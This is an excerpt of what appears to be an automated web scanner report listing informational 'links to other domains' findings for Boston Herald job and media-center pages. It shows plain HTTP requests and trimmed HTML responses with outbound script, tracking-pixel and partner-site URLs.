Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // jobfind/index.tmpl
...[SNIP]...
<![endif]-->

<link rel="alternate" title="Jobfind - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/jobfind/" type="application/rss+xml">

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
   <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fjobfind%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/my_searches.html?partner=bostonherald">My Searches</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/saved_job_manager.html?partner=bostonherald">My Jobs</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/myhj/resume-manager.html?partner=bostonherald">My Resumes</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://jobfind.salary.com/">What are you worth?</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div class="hjConsoleHeader">
       <a target="hotjobs" href="http://hotjobs.yahoo.com" ylc="http://hotjobs.yahoo.com/;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">
           <img src="http://l.yimg.com/a/i/us/hj/gr2/monst_lo_nwsp_console_3.gif" alt="Search for jobs with Monster+HotJobs" style="border-width:0px;"/>
       </a>
...[SNIP]...
ize:11px;color:#000000;background:transparent url(http://l.yimg.com/a/i/us/hj/gr/yellow-buttons.gif) no-repeat scroll 0px 0px;height:22px;width:75px;cursor:pointer;float:right;margin-right:10px;">
               <a target="hotjobs" href="http://hotjobs.yahoo.com/jobs-search-advanced/" ylc="http://hotjobs.yahoo.com/jobs-search-advanced/;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald" style="font-size:85%;color:#004CCA;text-decoration:underline;">Advanced Search</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobseeker/login/login.html?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald" ylc="http://hotjobs.yahoo.com/jobseeker/login/login.html;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald&partner=bostonherald">Sign In</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="https://us.lrd.yahoo.com/_ylc=X3oDMTFxZmRpYTFrBF9TAzM5NjUxMTI1MQRsaWQDcmVnaXN0ZXIEcGFydG5lcgNib3N0b25oZXJhbGQEc3JjA2NvbnNvbGU-/SIG=15hpku0jd/**https%3A//login.yahoo.com/config/eval_register%3F.last=http%253A%252F%252Fhotjobs.yahoo.com%252Fjobseeker%252Flogin%252Flogin.html%253Fpartner%253Dbostonherald%26.src=hotjobs">Register</a>
...[SNIP]...
</h1>
       <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/resume" ylc="http://hotjobs.yahoo.com/resume;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Resumes</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/interview" ylc="http://hotjobs.yahoo.com/interview;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Interviewing</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/salary" ylc="http://hotjobs.yahoo.com/salary;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Salary</a><br />
       <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/networking" ylc="http://hotjobs.yahoo.com/networking;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Networking</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/diversity" ylc="http://hotjobs.yahoo.com/diversity;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Diversity</a>
...[SNIP]...
<div class="hjConsoleContent hjConsoleContentRight">
       <a target="hotjobs" href="http://hotjobs.yahoo.com/create-resume" ylc="http://hotjobs.yahoo.com/create-resume;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">
           <img src="http://l.yimg.com/a/i/us/hj/post_resume.gif" alt="Post Your Resume Now" style="border-width:0px;margin-left:10px;"/>
       </a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Accounting & Finance</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Clerical & Admin</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Healthcare</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Retail</a></li>
           <li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Sales</a></li>
           <li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Technology</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-search-category" ylc="http://hotjobs.yahoo.com/jobs-search-category;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">More Job Categories...</a>
...[SNIP]...
</span> <a href="http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald&dest_page=CSB" style="color: rgb(0, 76, 202);">Search Resumes</a>
...[SNIP]...
</span> <a href="http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?showhiring=true&P=bostonherald" style="color: rgb(0, 76, 202);">Save with Starter Packs</a>
...[SNIP]...
<div style="padding-top: 5px;">HotJobs Customer? <a target="hotjobs" href="http://selfcare.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald" style="color: rgb(0, 76, 202); text-decoration: underline;">Sign In</a>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://us.bc.yahoo.com/b?P=CO_vyULEenJcz9lH2_GkPAdIzIkMMk1DgrsADsRj&T=17ul1btni%2fX%3d1296270011%2fE%3d396511251%2fR%3dhojo%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY%3dYAHOO%2fF%3d2975542127%2fH%3dc2VydmVJZD0iQ09fdnlVTEVlbkpjejlsSDJfR2tQQWRJeklrTU1rMURncnNBRHNSaiIgc2l0ZUlkPSI0NDYxMDUxIiB0U3RtcD0iMTI5NjI3MDAxMTk3NDMwNyIg%2fQ%3d-1%2fS%3d1%2fJ%3d1F7AC442"></noscript>
...[SNIP]...
<div style="position: relative; top: -70px; left: 275px; text-align: center; background-color: white; width: 150px; border: 1px solid #666;"><a href="http://bostonherald.boocoo.com"><img src="http://cache.heraldinteractive.com/advertising/boocoo/boocoo.jpg" border="0" /></a></div>


            <a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/search_results.html?partner=bostonherald&company_gid=597605&updated_since=anytime"><img src="http://cache.heraldinteractive.com/images/siteImages/viewHeraldJobsOnly.gif"></a>
...[SNIP]...
<div class="jobfindDivTop"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindNewsCorner.gif" alt="Jobfind News Corner" /></div>
...[SNIP]...
</a>
        <a href="http://feeds.feedburner.com/bostonherald/jobfind/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xml3.gif" alt="XML" /></a>
...[SNIP]...
</div>
                           <img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/20110128/stp/f8b94c_taco012811.jpg" alt="Photo" />
                       <span class="ArticleSummary">
...[SNIP]...
</div>
<img src="http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindFeaturedEmployer.gif" alt="Jobfind Featured Employers" />
</div>
...[SNIP]...
<br />
+&nbsp;<a class="LinksDarkRedNone" href="http://bh.heraldinteractive.com/jobfind/resume_edge/">Build the perfect resume now!</a>
...[SNIP]...
<div class="jobfindDivTop">
<a href="http://jobfind.salary.com"><img src="http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindWhatAreYouWorth.gif" alt="Jobfind Job Salary Wizard" /></a>
...[SNIP]...
<form name="newsearchform" method="get" action="http://jobfind.salary.com/salarywizard/layoutscripts/swzl_titleselect.asp" onsubmit="return gotoTitleSelect();"><script language="javascript" src="http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js"></script>
...[SNIP]...
<li><a href="http://jobfind.salary.com"><img src="http://bh.heraldinteractive.com/images/siteImages/jobfind/salaryWizardLogo.gif" alt="Jobfind Job Salary Wizard"></a>
...[SNIP]...
<div id="jobfindSalaryDoubleDivLeft">
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/CostOfLivingWizard/layoutscripts/coll_start.asp">Cost of Living Wizard</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/jobassessor/layoutscripts/joel_start.asp">Job Assessor</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/collegetuitionplanner/layoutscripts/cltl_start.asp">College Tuition Planner</a>
...[SNIP]...
<div id="jobfindSalaryDoubleDivRight">
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/millionairemaker/layoutscripts/mlcl_start.asp">How long until you make a million?</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/salarytimer/layoutscripts/stml_start.asp">Compare yourself to the power players</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/execcomp/layoutscripts/excl_companysearch.asp">Executive Compensation Wizard</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

7.12. http://www.bostonherald.com/mediacenter/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /mediacenter/index.php?media_type_photo=0&media_type_video=1&media_type_audio=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:57:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 339722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>


                            <script src="http://cache.heraldinteractive.com/js/lightbox.js" type="text/javascript"></script>
                                <script src="http://cache.heraldinteractive.com/js/tooltips.js?fresh=283" type="text/javascript"></script>
...[SNIP]...
<![endif]-->


<link rel="alternate" title="Photos & Video - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/mediacenter/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fmediacenter%2Findex.php%3Fmedia_type_photo%3D0%26media_type_video%3D1%26media_type_audio%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://buyheraldphotos.com">Buy Herald Photos</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
ideo" name="media_type_video" value="1" checked="checked" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" /><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.png" style="position:relative; top: 4px;" /> Video

&nbsp;

   <!--
<input type="submit" class="mediaTypeBtn " name="media_type" value="Audio" onclick="if($('media_type_audio').
...[SNIP]...
id="media_type_photo" name="media_type_photo" value="0" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" /><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPhoto.png" style="position:relative; top: 4px;" /> Photo

&nbsp;

</div>
...[SNIP]...
<div id="navPaneOverlay" ><img class="ajax_loader" src="http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader-big-blackBg.gif" /></div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay0" class="nowPlayingOverlay" width="40" style=" display: block; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay1" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4862','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110125/stp/036e70_012411celtsnl02.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4856','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110122/stp/03331b_012111hockeyce005.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4855','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110122/stp/3ab710_012111celticssc02.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4848','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110121/stp/830e10_012011bruinsms02.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4846','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110120/stp/fcbae7_011911celticsms04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4845','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110119/stp/7c5708_011911soxnl10.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Red Sox Rookie Program at BC"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Red Sox Rookie Program at BC">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4843','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110118/stp/022de6_011711celticsce030.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4841','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110117/stp/95be5a_011711bruinsnl20.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4831','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110116/stp/54c191_Seahawks_Bears_Football__trose@heraldinteractive.com_24.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
